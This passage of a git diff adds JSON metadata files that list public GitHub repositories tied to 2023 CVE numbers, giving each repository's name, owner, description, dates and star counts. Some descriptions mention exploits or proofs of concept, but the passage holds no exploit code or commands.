"Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/CVE-2023-28588", + "description": null, + "fork": false, + "created_at": "2024-01-12T14:15:42Z", + "updated_at": "2024-01-12T16:38:02Z", + "pushed_at": "2024-01-12T14:20:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742472564, + "name": "CVE-2023-28588_system_bt", + "full_name": "uthrasri\/CVE-2023-28588_system_bt", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_system_bt", + "description": "system_bt_CVE-2023-28588", + "fork": false, + "created_at": "2024-01-12T14:58:59Z", + "updated_at": "2024-01-12T15:00:53Z", + "pushed_at": "2024-01-12T15:13:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745490193, + "name": "CVE-2023-28588_Singlefile", + "full_name": "uthrasri\/CVE-2023-28588_Singlefile", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_Singlefile", + "description": null, + "fork": false, + "created_at": "2024-01-19T12:58:22Z", + "updated_at": "2024-01-19T13:06:38Z", + "pushed_at": "2024-01-19T13:07:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745534292, + "name": "G2.5_CVE-2023-28588", + "full_name": "uthrasri\/G2.5_CVE-2023-28588", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/G2.5_CVE-2023-28588", + "description": null, + "fork": false, + "created_at": "2024-01-19T14:46:51Z", + "updated_at": "2024-01-19T14:46:51Z", + "pushed_at": "2024-01-19T14:46:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746664124, + "name": "CVE-2023-28588_G2.5_singlefile", + "full_name": "uthrasri\/CVE-2023-28588_G2.5_singlefile", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_G2.5_singlefile", + "description": null, + "fork": false, + "created_at": "2024-01-22T13:17:35Z", + "updated_at": "2024-01-22T13:18:30Z", + "pushed_at": "2024-01-22T13:19:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2859.json b/2023/CVE-2023-2859.json new file mode 100644 index 0000000000..b2c1a39f31 --- /dev/null +++ b/2023/CVE-2023-2859.json @@ -0,0 +1,33 @@ +[ + { + "id": 644829145, + "name": "CVE-2023-2859", + "full_name": "mnqazi\/CVE-2023-2859", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-2859", + "description": "CVE-2023-2859 Medium Blog", + "fork": false, + "created_at": "2023-05-24T10:46:34Z", + "updated_at": "2023-05-24T11:01:28Z", + "pushed_at": "2023-05-24T10:59:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2868.json b/2023/CVE-2023-2868.json new file mode 100644 index 0000000000..3a7c1c02de --- /dev/null +++ b/2023/CVE-2023-2868.json @@ -0,0 +1,95 @@ +[ + { + "id": 656339964, + "name": "poc-cve-2023-2868", + "full_name": "cfielding-r7\/poc-cve-2023-2868", + "owner": { + "login": "cfielding-r7", + "id": 131053218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131053218?v=4", + "html_url": "https:\/\/github.com\/cfielding-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cfielding-r7\/poc-cve-2023-2868", + "description": null, + "fork": false, + "created_at": "2023-06-20T18:43:54Z", + "updated_at": "2024-06-21T10:27:27Z", + "pushed_at": "2023-07-05T20:02:55Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 672605144, + "name": "CVE-2023-2868CVE-2023-2868", + "full_name": "cashapp323232\/CVE-2023-2868CVE-2023-2868", + "owner": { + "login": "cashapp323232", + "id": 64687677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64687677?v=4", + "html_url": "https:\/\/github.com\/cashapp323232", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cashapp323232\/CVE-2023-2868CVE-2023-2868", + "description": null, + "fork": false, + "created_at": "2023-07-30T16:42:27Z", + "updated_at": "2023-07-30T16:42:27Z", + "pushed_at": "2023-08-05T12:24:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683041709, + "name": "CVE-2023-2868", + "full_name": "krmxd\/CVE-2023-2868", + "owner": { + "login": "krmxd", + "id": 48358384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48358384?v=4", + "html_url": "https:\/\/github.com\/krmxd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krmxd\/CVE-2023-2868", + "description": null, + "fork": false, + "created_at": "2023-08-25T13:07:51Z", + "updated_at": "2023-08-25T13:07:51Z", + "pushed_at": "2023-08-25T13:08:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28753.json b/2023/CVE-2023-28753.json new file mode 100644 index 0000000000..7e3cbca576 --- /dev/null +++ b/2023/CVE-2023-28753.json @@ -0,0 +1,33 @@ +[ + { + "id": 856641353, + "name": "CVE-2023-28753", + "full_name": "pingjuiliao\/CVE-2023-28753", + "owner": { + "login": "pingjuiliao", + "id": 40479475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40479475?v=4", + "html_url": "https:\/\/github.com\/pingjuiliao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pingjuiliao\/CVE-2023-28753", + "description": "pwning netconsd", + "fork": false, + "created_at": "2024-09-12T23:57:39Z", + "updated_at": "2024-09-14T05:41:16Z", + "pushed_at": "2024-09-14T05:41:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2877.json b/2023/CVE-2023-2877.json new file mode 100644 index 0000000000..edf04d7426 --- /dev/null +++ b/2023/CVE-2023-2877.json @@ -0,0 +1,33 @@ +[ + { + "id": 659681397, + "name": "CVE-2023-2877", + "full_name": "RandomRobbieBF\/CVE-2023-2877", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-2877", + "description": "Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution", + "fork": false, + "created_at": "2023-06-28T10:34:08Z", + "updated_at": "2024-08-12T20:31:56Z", + "pushed_at": "2023-06-28T11:25:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28771.json b/2023/CVE-2023-28771.json new file mode 100644 index 0000000000..a41f81231a --- /dev/null +++ b/2023/CVE-2023-28771.json @@ -0,0 +1,35 @@ +[ + { + "id": 644192831, + "name": "CVE-2023-28771-PoC", + "full_name": "benjaminhays\/CVE-2023-28771-PoC", + "owner": { + "login": "benjaminhays", + "id": 106408899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106408899?v=4", + "html_url": "https:\/\/github.com\/benjaminhays", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/benjaminhays\/CVE-2023-28771-PoC", + "description": "PoC for CVE-2023-28771 based on Rapid7's excellent writeup", + "fork": false, + "created_at": "2023-05-23T02:37:39Z", + "updated_at": "2024-06-19T11:16:08Z", + "pushed_at": "2023-05-23T02:49:05Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-28771" + ], + "visibility": "public", + "forks": 7, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28772.json b/2023/CVE-2023-28772.json new file mode 100644 index 0000000000..68f487c37b --- /dev/null +++ b/2023/CVE-2023-28772.json @@ -0,0 +1,95 @@ +[ + { + "id": 639306883, + "name": "linux-4.1.15_CVE-2023-28772", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-28772", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-28772", + "description": null, + "fork": false, + "created_at": "2023-05-11T07:47:25Z", + "updated_at": "2023-05-11T08:29:54Z", + "pushed_at": "2023-05-11T13:02:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639374711, + "name": "linux-4.1.15_CVE-2023-28772", + "full_name": "Satheesh575555\/linux-4.1.15_CVE-2023-28772", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.1.15_CVE-2023-28772", + "description": null, + "fork": false, + "created_at": "2023-05-11T10:46:48Z", + "updated_at": "2023-05-11T10:52:38Z", + "pushed_at": "2023-05-12T09:29:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639746800, + "name": "kernel_v4.1.15_CVE-2023-28772", + "full_name": "hshivhare67\/kernel_v4.1.15_CVE-2023-28772", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.1.15_CVE-2023-28772", + "description": null, + "fork": false, + "created_at": "2023-05-12T06:19:09Z", + "updated_at": "2023-05-12T06:37:08Z", + "pushed_at": "2023-05-12T10:28:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28810.json b/2023/CVE-2023-28810.json new file mode 100644 index 0000000000..21285cb5e4 --- /dev/null +++ b/2023/CVE-2023-28810.json @@ -0,0 +1,33 @@ +[ + { + "id": 655545639, + "name": "CVE-2023-28810", + "full_name": "skylightcyber\/CVE-2023-28810", + "owner": { + "login": "skylightcyber", + "id": 49059122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49059122?v=4", + "html_url": "https:\/\/github.com\/skylightcyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skylightcyber\/CVE-2023-28810", + "description": "Exploit code for CVE-2023-28810", + "fork": false, + "created_at": "2023-06-19T05:57:22Z", + "updated_at": "2023-09-15T00:05:49Z", + "pushed_at": "2023-06-19T06:39:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29007.json b/2023/CVE-2023-29007.json new file mode 100644 index 0000000000..e9e0f99cb4 --- /dev/null +++ b/2023/CVE-2023-29007.json @@ -0,0 +1,97 @@ +[ + { + "id": 632970924, + "name": "CVE-2023-29007", + "full_name": "ethiack\/CVE-2023-29007", + "owner": { + "login": "ethiack", + "id": 99984073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99984073?v=4", + "html_url": "https:\/\/github.com\/ethiack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethiack\/CVE-2023-29007", + "description": "PoC repository for CVE-2023-29007", + "fork": false, + "created_at": "2023-04-26T14:00:11Z", + "updated_at": "2024-12-09T01:45:06Z", + "pushed_at": "2023-04-26T14:21:51Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve" + ], + "visibility": "public", + "forks": 13, + "watchers": 33, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 635547855, + "name": "CVE-2023-29007", + "full_name": "omespino\/CVE-2023-29007", + "owner": { + "login": "omespino", + "id": 8670352, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8670352?v=4", + "html_url": "https:\/\/github.com\/omespino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omespino\/CVE-2023-29007", + "description": null, + "fork": false, + "created_at": "2023-05-02T23:47:51Z", + "updated_at": "2023-05-02T23:48:04Z", + "pushed_at": "2023-05-03T00:13:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637089393, + "name": "CVE-2023-29007_win-version", + "full_name": "x-Defender\/CVE-2023-29007_win-version", + "owner": { + "login": "x-Defender", + "id": 73282041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73282041?v=4", + "html_url": "https:\/\/github.com\/x-Defender", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x-Defender\/CVE-2023-29007_win-version", + "description": null, + "fork": false, + "created_at": "2023-05-06T13:25:35Z", + "updated_at": "2023-05-23T11:09:31Z", + "pushed_at": "2023-05-06T13:32:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29017.json b/2023/CVE-2023-29017.json new file mode 100644 index 0000000000..af213e3a8e --- /dev/null +++ b/2023/CVE-2023-29017.json @@ -0,0 +1,64 @@ +[ + { + "id": 624975184, + "name": "seongil-wi-CVE-2023-29017", + "full_name": "timb-machine-mirrors\/seongil-wi-CVE-2023-29017", + "owner": { + "login": "timb-machine-mirrors", + "id": 49810875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4", + "html_url": "https:\/\/github.com\/timb-machine-mirrors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timb-machine-mirrors\/seongil-wi-CVE-2023-29017", + "description": "Clone from gist", + "fork": false, + "created_at": "2023-04-07T18:26:25Z", + "updated_at": "2023-04-13T15:04:33Z", + "pushed_at": "2023-04-07T18:26:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 668528727, + "name": "CVE-2023-29017-reverse-shell", + "full_name": "passwa11\/CVE-2023-29017-reverse-shell", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-29017-reverse-shell", + "description": null, + "fork": false, + "created_at": "2023-07-20T03:04:26Z", + "updated_at": "2023-12-27T16:19:20Z", + "pushed_at": "2023-04-10T20:24:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29084.json b/2023/CVE-2023-29084.json new file mode 100644 index 0000000000..403d27a557 --- /dev/null +++ b/2023/CVE-2023-29084.json @@ -0,0 +1,33 @@ +[ + { + "id": 628788120, + "name": "CVE-2023-29084", + "full_name": "ohnonoyesyes\/CVE-2023-29084", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-29084", + "description": "Command injection in ManageEngine ADManager Plus", + "fork": false, + "created_at": "2023-04-17T01:32:29Z", + "updated_at": "2024-06-17T10:34:08Z", + "pushed_at": "2023-04-17T01:33:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2916.json b/2023/CVE-2023-2916.json new file mode 100644 index 0000000000..1c77457d32 --- /dev/null +++ b/2023/CVE-2023-2916.json @@ -0,0 +1,33 @@ +[ + { + "id": 678836726, + "name": "CVE-2023-2916", + "full_name": "d0rb\/CVE-2023-2916", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-2916", + "description": "CVE-2023-2916 PoC", + "fork": false, + "created_at": "2023-08-15T13:51:38Z", + "updated_at": "2023-08-15T13:53:04Z", + "pushed_at": "2023-08-15T13:53:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2928.json b/2023/CVE-2023-2928.json new file mode 100644 index 0000000000..ba463bf290 --- /dev/null +++ b/2023/CVE-2023-2928.json @@ -0,0 +1,33 @@ +[ + { + "id": 702913218, + "name": "DedeCMS-getshell-CVE-2023-2928-", + "full_name": "CN016\/DedeCMS-getshell-CVE-2023-2928-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/DedeCMS-getshell-CVE-2023-2928-", + "description": "DedeCMS文件包含漏洞导致后台getshell(CVE-2023-2928)复现", + "fork": false, + "created_at": "2023-10-10T08:46:17Z", + "updated_at": "2024-11-12T09:02:45Z", + "pushed_at": "2023-10-10T08:46:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29324.json b/2023/CVE-2023-29324.json new file mode 100644 index 0000000000..8820cad3e6 --- /dev/null +++ b/2023/CVE-2023-29324.json @@ -0,0 +1,33 @@ +[ + { + "id": 640349187, + "name": "CVE-2023-29324_Patch_Deploy", + "full_name": "OLeDouxEt\/CVE-2023-29324_Patch_Deploy", + "owner": { + "login": "OLeDouxEt", + "id": 111026713, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111026713?v=4", + "html_url": "https:\/\/github.com\/OLeDouxEt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OLeDouxEt\/CVE-2023-29324_Patch_Deploy", + "description": null, + "fork": false, + "created_at": "2023-05-13T19:40:43Z", + "updated_at": "2024-08-10T17:51:58Z", + "pushed_at": "2023-05-13T21:56:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29336.json b/2023/CVE-2023-29336.json new file mode 100644 index 0000000000..7088448079 --- /dev/null +++ b/2023/CVE-2023-29336.json @@ -0,0 +1,33 @@ +[ + { + "id": 651595530, + "name": "CVE-2023-29336", + "full_name": "m-cetin\/CVE-2023-29336", + "owner": { + "login": "m-cetin", + "id": 102237861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4", + "html_url": "https:\/\/github.com\/m-cetin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-cetin\/CVE-2023-29336", + "description": null, + "fork": false, + "created_at": "2023-06-09T15:36:45Z", + "updated_at": "2024-08-04T18:38:08Z", + "pushed_at": "2023-06-09T15:41:53Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29343.json b/2023/CVE-2023-29343.json new file mode 100644 index 0000000000..8995d70366 --- /dev/null +++ b/2023/CVE-2023-29343.json @@ -0,0 +1,33 @@ +[ + { + "id": 655256964, + "name": "CVE-2023-29343", + "full_name": "Wh04m1001\/CVE-2023-29343", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2023-29343", + "description": null, + "fork": false, + "created_at": "2023-06-18T11:14:08Z", + "updated_at": "2025-01-05T21:11:25Z", + "pushed_at": "2023-06-18T11:51:54Z", + "stargazers_count": 159, + "watchers_count": 159, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 159, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29357.json b/2023/CVE-2023-29357.json new file mode 100644 index 0000000000..b8e6a0c265 --- /dev/null +++ b/2023/CVE-2023-29357.json @@ -0,0 +1,195 @@ +[ + { + "id": 696891493, + "name": "CVE-2023-29357", + "full_name": "Chocapikk\/CVE-2023-29357", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-29357", + "description": "Microsoft SharePoint Server Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2023-09-26T16:18:41Z", + "updated_at": "2024-12-19T14:57:41Z", + "pushed_at": "2023-09-26T19:04:21Z", + "stargazers_count": 230, + "watchers_count": 230, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24955", + "cve-2023-29357", + "exploit", + "infosec", + "microsoft", + "sharepoint" + ], + "visibility": "public", + "forks": 31, + "watchers": 230, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 698771899, + "name": "CVE-2023-29357", + "full_name": "LuemmelSec\/CVE-2023-29357", + "owner": { + "login": "LuemmelSec", + "id": 58529760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58529760?v=4", + "html_url": "https:\/\/github.com\/LuemmelSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LuemmelSec\/CVE-2023-29357", + "description": null, + "fork": false, + "created_at": "2023-09-30T23:17:04Z", + "updated_at": "2024-12-18T15:14:25Z", + "pushed_at": "2023-10-10T19:00:30Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703043275, + "name": "CVE-2023-29357-ExE", + "full_name": "KeyStrOke95\/CVE-2023-29357-ExE", + "owner": { + "login": "KeyStrOke95", + "id": 12446252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12446252?v=4", + "html_url": "https:\/\/github.com\/KeyStrOke95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KeyStrOke95\/CVE-2023-29357-ExE", + "description": "Recreation of the SharePoint PoC for CVE-2023-29357 in C# from LuemmelSec", + "fork": false, + "created_at": "2023-10-10T13:41:21Z", + "updated_at": "2024-02-17T23:21:40Z", + "pushed_at": "2023-10-10T13:44:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734652064, + "name": "cve-2023-29357-Sharepoint", + "full_name": "Guillaume-Risch\/cve-2023-29357-Sharepoint", + "owner": { + "login": "Guillaume-Risch", + "id": 60431931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60431931?v=4", + "html_url": "https:\/\/github.com\/Guillaume-Risch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Guillaume-Risch\/cve-2023-29357-Sharepoint", + "description": null, + "fork": false, + "created_at": "2023-12-22T08:42:00Z", + "updated_at": "2024-12-06T15:00:26Z", + "pushed_at": "2023-12-22T08:49:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 